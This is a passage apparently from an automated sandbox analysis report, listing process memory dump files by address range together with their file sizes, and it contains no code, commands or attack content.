                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2.6MB

                                                                                                                                                                                      • memory/4216-4872-0x00000000004D0000-0x00000000004D8000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        32KB

                                                                                                                                                                                      • memory/4788-5842-0x0000000000880000-0x000000000100C000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        7.5MB

                                                                                                                                                                                      • memory/4788-5843-0x0000000005A90000-0x0000000005ADA000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        296KB

                                                                                                                                                                                      • memory/4788-5844-0x0000000005A70000-0x0000000005A94000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        144KB

                                                                                                                                                                                      • memory/4788-5845-0x0000000005FD0000-0x00000000060B6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        920KB

                                                                                                                                                                                      • memory/4788-5846-0x0000000006350000-0x00000000064AB000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.4MB

                                                                                                                                                                                      • memory/4788-5867-0x000000000D250000-0x000000000D302000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        712KB

                                                                                                                                                                                      • memory/4788-5872-0x000000000D120000-0x000000000D142000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        136KB

                                                                                                                                                                                      • memory/4788-5873-0x000000000EF50000-0x000000000F2A4000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.3MB